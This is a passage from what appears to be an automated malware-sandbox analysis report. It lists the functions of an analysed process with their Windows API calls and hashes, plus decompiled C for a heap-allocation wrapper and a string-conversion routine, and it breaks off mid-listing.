                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007F96A9,00000800,00000000,00000000), ref: 007F98BA
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: aa49b93fd18a36247ee7663aa9e4cd01b306a7c3cda7b3351c852cfc40bf0049
                • Instruction ID: 096095caaefb45921df5b7a422fd3ba3e0848577446078ea056794729d9a1aa5
                • Opcode Fuzzy Hash: aa49b93fd18a36247ee7663aa9e4cd01b306a7c3cda7b3351c852cfc40bf0049
                • Instruction Fuzzy Hash: E811F2B69002499BDB10CF9AC444BEEBBF4EB49350F10842AE629B7700C378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BB8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
                Download Yara Rule
                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051BB957
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 74b2e4a4962ffeb9134c41b00b3a91ad698bc30853ddde4b986e428f892065f4
                • Instruction ID: fd549ce429e02940b82fdfc4b977367dd6af2d967d2988aae52927d2b3435fd0
                • Opcode Fuzzy Hash: 74b2e4a4962ffeb9134c41b00b3a91ad698bc30853ddde4b986e428f892065f4
                • Instruction Fuzzy Hash: BD1134B18042499FDB10CFAAC844BDEBFF8EB48320F14841AE925B7210C378A954DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B32D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,007B53E8,00000000,?), ref: 051BE73D
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 3443bc639e0812783108204c7f0ef1344ea57ff4dc97554868f7be6eb7951284
                • Instruction ID: 205b3c71dd7264f311c55987dad581b986ebbf4a286ea3ef0a644163fb4822e7
                • Opcode Fuzzy Hash: 3443bc639e0812783108204c7f0ef1344ea57ff4dc97554868f7be6eb7951284
                • Instruction Fuzzy Hash: CF1128B58007499FDB10CF99C485BEEBBF8FB48310F10842AE554B3240D378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05276832, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(?), ref: 05276890
                Memory Dump Source
                • Source File: 0000000E.00000002.321291512.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 106ec896b10376394f1ef076bf5475a4bdde127f63983cb64112732ff2114c22
                • Instruction ID: ca863f9f6dda4a26e5f15b363af1a6d74dabcb692cdf7c25c81e477021578522
                • Opcode Fuzzy Hash: 106ec896b10376394f1ef076bf5475a4bdde127f63983cb64112732ff2114c22
                • Instruction Fuzzy Hash: 3811F5B58006498FCB10CF99D489BDEBBF4EF48324F14842AE969B7240D778A549CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BA548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 051BBCBD
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: c60bdef4d2c87589a6c1832b1c8cabdf579658ca49aa92cee3a0891f8894993f
                • Instruction ID: 89f377917c648b08e244ca71cab05b7080e21016f13d878c54f131dfcab9fcb5
                • Opcode Fuzzy Hash: c60bdef4d2c87589a6c1832b1c8cabdf579658ca49aa92cee3a0891f8894993f
                • Instruction Fuzzy Hash: 8211E0B59046489FDB20CF9AC484BDEBBF8FB48310F10885AE919B7600C3B4A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B1540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051B226A,?,00000000,?), ref: 051BC435
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 1ec24f6043838b9851b3cd2fdfa07b83fade48cf3c5b8432737dbf5ad6de8c0c
                • Instruction ID: 237b6c9d116332067b44df5544235e6e591054bf343b04042044f32e140be3d3
                • Opcode Fuzzy Hash: 1ec24f6043838b9851b3cd2fdfa07b83fade48cf3c5b8432737dbf5ad6de8c0c
                • Instruction Fuzzy Hash: 9511F5B58007499FDB10CF99C484BEEBBF8FB48314F108419E515B7600C3B4A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B50D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 051BD29D
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 54f70b64ac39bbdff2455839d0eceafe7ca42b1675949cc93033e5c3c3c74206
                • Instruction ID: 80378c763896f98991a8dbb53a59e0205570e58c857408cc4266b4c8be9b452d
                • Opcode Fuzzy Hash: 54f70b64ac39bbdff2455839d0eceafe7ca42b1675949cc93033e5c3c3c74206
                • Instruction Fuzzy Hash: 2511C5B59046499FDB10CF9AD544BDEBBF8FB48314F108459E919B7200C3B5A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BD238, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 051BD29D
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 39f39cf3bda570ac58d04824424c36a1c9e382a962d82ac6a3a56638ee6946ec
                • Instruction ID: 5e7a75af23025208a4d1f1d3c5c4d45a9cf186760617cc9b0d7a08e23fa7c212
                • Opcode Fuzzy Hash: 39f39cf3bda570ac58d04824424c36a1c9e382a962d82ac6a3a56638ee6946ec
                • Instruction Fuzzy Hash: AE11F2B58006489FDB10CF99D885BDEBBF8FB48310F10841AE918B7600C378AA44CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05276838, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(?), ref: 05276890
                Memory Dump Source
                • Source File: 0000000E.00000002.321291512.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 411323be5b163240cd09910719cbccd9274e26801ae701e4e561aaa3108ca3e6
                • Instruction ID: 2525e46116370a7ed3b887a2e8df50ed29f95dc4e5b48d6fb29a38d7b72e0a03
                • Opcode Fuzzy Hash: 411323be5b163240cd09910719cbccd9274e26801ae701e4e561aaa3108ca3e6
                • Instruction Fuzzy Hash: 881103B18006498FCB20CF99C484BDEBBF4EF48324F10842AD969B7340D778A949CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007F95C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 007F962E
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: c2295915d92470cfce3145ead6daaa79ed55ed7fce043920f3105f4fa3e53c50
                • Instruction ID: 8a95048b60956b0f572711f12c00668ea1b48a87c300ac1418555ff4ebe79248
                • Opcode Fuzzy Hash: c2295915d92470cfce3145ead6daaa79ed55ed7fce043920f3105f4fa3e53c50
                • Instruction Fuzzy Hash: 8D11E0B5D006498FDB10CF9AC444BDEFBF4AB88324F10852AD929B7700C378A546CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007FFE38, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 007FFE9D
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 4978ed9b7185bf2139b3a565e6b5305d33a0e6e73a609a6cb57c10a6e9f49a53
                • Instruction ID: 786445aa5a431b5b014d0f5aeec28dcc4c69733eb87ee3bf6faaadc8f794d570
                • Opcode Fuzzy Hash: 4978ed9b7185bf2139b3a565e6b5305d33a0e6e73a609a6cb57c10a6e9f49a53
                • Instruction Fuzzy Hash: 9A11F2B58003489FDB20CF99D585BEEBBF4EB49324F10851AE919B7301C378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BC3D0, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051B226A,?,00000000,?), ref: 051BC435
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 91c95962f1a16e53f197f736ac63d5e09513531fc47b1bbf0eecf35691a18fcd
                • Instruction ID: 065954fe1529e85f31ecd12fc4fb3f23494378e67fc99c1762c31b4e6595e124
                • Opcode Fuzzy Hash: 91c95962f1a16e53f197f736ac63d5e09513531fc47b1bbf0eecf35691a18fcd
                • Instruction Fuzzy Hash: F711D6B58006499FDB10CF99D485BDEFBF8FB58314F108419E555B7600C378A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BBC59, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 051BBCBD
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 335bdaf5b35fba125854f27887848d356d000a03ed43295d37f71078a0ef9eaa
                • Instruction ID: 7b74625922d8a7db26bcd4adbcdc6fa37562fb7bac5149043a3b4a4702d90cc3
                • Opcode Fuzzy Hash: 335bdaf5b35fba125854f27887848d356d000a03ed43295d37f71078a0ef9eaa
                • Instruction Fuzzy Hash: 5911C2B58046499FDB10CF99D885BDEBBF8EB48314F20881AE919A7600C378A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05270438, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.321291512.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 68ee3e247de1090f15dcaa5bee639ac182933b736fc0fe81a0e724665b6f24b8
                • Instruction ID: f608eea0ce8c5d78b8468483f774aa8bc689ddb7f93edfb030357450fe38cbc4
                • Opcode Fuzzy Hash: 68ee3e247de1090f15dcaa5bee639ac182933b736fc0fe81a0e724665b6f24b8
                • Instruction Fuzzy Hash: D211E0B1C046998FDB10CF9AD448BDEBBF4AB48214F10852AE519B7600D378A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007FFE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                Download Yara Rule
                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 007FFE9D
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: d421c5110a9c50cc4582ff625ce70d224fdda89fe4252c8cbd84fffb54e07420
                • Instruction ID: 4e826457b4cd412ff8d50ef7f71b77356a9cc7a72f00d32d042e02ff1a1512ae
                • Opcode Fuzzy Hash: d421c5110a9c50cc4582ff625ce70d224fdda89fe4252c8cbd84fffb54e07420
                • Instruction Fuzzy Hash: 8511E5B59006499FDB10CF99D485BDEFBF8EB48324F10851AE919B7340C378A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05270440, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.321291512.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 296a488a5527eb406c7dfd7394686967da5ca042b96459c011d677d3cd6a98c9
                • Instruction ID: 33d537529a1188f4c2abec7c19b19c50c41cef356877934b51ad1f0ec35f140f
                • Opcode Fuzzy Hash: 296a488a5527eb406c7dfd7394686967da5ca042b96459c011d677d3cd6a98c9
                • Instruction Fuzzy Hash: D711CEB5D046598FCB10CF9AD448BDEFBF4AB48314F10852AE829B7600D378A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                0x00403e3d
                0x00403e43
                0x00403e49
                0x00403e7b
                0x00403e80
                0x00403e86
                0x00000000
                0x00403e86
                0x00403e4d
                0x00403e4f
                0x00403e4f
                0x00403e66
                0x00403e6f
                0x00403e77
                0x00000000
                0x00000000
                0x00403e57
                0x00403e59
                0x00000000
                0x00000000
                0x00403e5c
                0x00403e61
                0x00403e62
                0x00403e64
                0x00000000
                0x00000000
                0x00403e64
                0x00000000

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0074D5B0, Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.318152305.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 68a99d9d57825be038b372b30d0560a88d3843ecf01aa92e0318117cf208c57d
                • Instruction ID: d1331867fc0bf5dbbdb2f0a8c82fab85fc81604be97f9955a995b94989ac26dc
                • Opcode Fuzzy Hash: 68a99d9d57825be038b372b30d0560a88d3843ecf01aa92e0318117cf208c57d
                • Instruction Fuzzy Hash: 0E2103B1508240DFCB21DF10D8C0B2ABF65FB88354F25C569E9494B20AC73ADC55CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0074D4C4, Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.318152305.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 939d296a90a26de2a68884734de34f0975b30bf678073fe8d9aace1e65e0ae78
                • Instruction ID: 0e6d90058ac7aecbd70dd29b27756b1eceb5f386c5a5fb148ebc1ed5308918dd
                • Opcode Fuzzy Hash: 939d296a90a26de2a68884734de34f0975b30bf678073fe8d9aace1e65e0ae78
                • Instruction Fuzzy Hash: 2A2106B1604240DFCB21DF14D8C0B2ABF65FB88318F24C569E9454B206C73ADC25C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0075D1D4, Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.318190929.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c38f34b94e51f67c8d73e2c63808ce0dd82c6a041f880d084f8ef0b1bfbbcf6b
                • Instruction ID: ccd447dac173ea1a33a7b71b3b2ae407ee24a352ba22f36da679e3a36d753cb9
                • Opcode Fuzzy Hash: c38f34b94e51f67c8d73e2c63808ce0dd82c6a041f880d084f8ef0b1bfbbcf6b
                • Instruction Fuzzy Hash: 222107B0508244EFDB21CF50D9C0B6ABB65FB88315F24C56DED094B246C7BADC4ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0075D01C, Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.318190929.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 885a6062b5ac4626e789b620cb79f4d7182a18cf2f90cfc06a264ecbf5b8219e
                • Instruction ID: 4119254f5593968e01b0b275db8806b19bc5ef21a0f68814a7f24acd624877dd
                • Opcode Fuzzy Hash: 885a6062b5ac4626e789b620cb79f4d7182a18cf2f90cfc06a264ecbf5b8219e
                • Instruction Fuzzy Hash: E121C170608244DFDB34DF14D9C4B6ABB65EB88315F24C569E90D4B286C7BADC0ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0075D005, Relevance: .1, Instructions: 63COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.318190929.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 930deed4b9df65f417f79b1a90de5cb479ea6d685861c9b0494efb552278d0d7
                • Instruction ID: 3f7093a39e137c5b5aa3cf00d689242fcf97438e7011c07bbaf946cd1bff179b
                • Opcode Fuzzy Hash: 930deed4b9df65f417f79b1a90de5cb479ea6d685861c9b0494efb552278d0d7
                • Instruction Fuzzy Hash: 642180755083809FCB12CF24D994B55BF71EB46314F28C5EAD8498B2A7C37ADC0ACB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0074D4BF, Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.318152305.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction ID: 8fb6ae5c8a796a3bc5c073c3f53c361c8b1e469530d69f24dd43a1a50e5e6b27
                • Opcode Fuzzy Hash: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction Fuzzy Hash: 8B11D376504280DFCB11CF10D9C4B1AFF71FB84324F24C6A9D8494B616C33AD96ACBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0074D5AB, Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.318152305.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction ID: 1a0b40f0c7362b249b3bf7b79414a67f55e71543d86b4d101e35febb99ab7bbb
                • Opcode Fuzzy Hash: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction Fuzzy Hash: 6011E676504280DFCF11CF10D9C4B16BF71FB84320F25C6A9E8494B216C33AD85ACBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0075D1CF, Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.318190929.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction ID: 7d5587b6d6d1e441952c977745383c18c207c0e7e98e4e826da16ecf627dd850
                • Opcode Fuzzy Hash: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction Fuzzy Hash: 80119D75904280DFDB21CF10D5C4B55FBA1FB84324F24C6AEDC494B656C37AD84ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0074D01D, Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.318152305.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 17f95e9cd78ca0b3139973e4e7d1454ad31185b1f23d3103c3716dcc42e4cf32
                • Instruction ID: 0379377364e1dbc403bb3190c8463d9c00239e540d0ff874be5983405061be6a
                • Opcode Fuzzy Hash: 17f95e9cd78ca0b3139973e4e7d1454ad31185b1f23d3103c3716dcc42e4cf32
                • Instruction Fuzzy Hash: B501A271508384AAE7304A25DC84B6BBB98EF41368F28C15AFD985B256C37DDC45C7B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0074D01C, Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.318152305.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 16eb9128a219bdba135b87bff7254cb71eb7de2fc8866a219e9ca1bd8c7dcaa6
                • Instruction ID: 8240509c4816e2bddb9e8cc1f833de0dd32bc6b1ee38a4c69ce2e8e9898c98c6
                • Opcode Fuzzy Hash: 16eb9128a219bdba135b87bff7254cb71eb7de2fc8866a219e9ca1bd8c7dcaa6
                • Instruction Fuzzy Hash: 4BF06271404284AEE7208E15DC84B67FB98EB41764F18C55AED985B296C3799C44CAB1
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x3bac56c0
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080DB(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                0x004078d4
                0x004078d5
                0x004078d6
                0x004078dd
                0x004078e2
                0x004078e8
                0x004078ee
                0x004078f4
                0x004078f7
                0x004078f7
                0x004078fa
                0x004078fc
                0x004078fc
                0x004078fa
                0x004078fe
                0x00407903
                0x0040790a
                0x0040790d
                0x0040790d
                0x00407929
                0x0040792f
                0x00407934
                0x00407ac7
                0x00407ad2
                0x00407ada
                0x0040793a
                0x0040793a
                0x0040793d
                0x00407942
                0x00407946
                0x0040799a
                0x0040799a
                0x0040799c
                0x0040799e
                0x00407abc
                0x00407abc
                0x00407abe
                0x00407abf
                0x00407ac5
                0x00000000
                0x00407ac5
                0x004079af
                0x004079b5
                0x004079b7
                0x00000000
                0x00000000
                0x004079bd
                0x004079cf
                0x004079d4
                0x004079d8
                0x00000000
                0x00000000
                0x004079e5
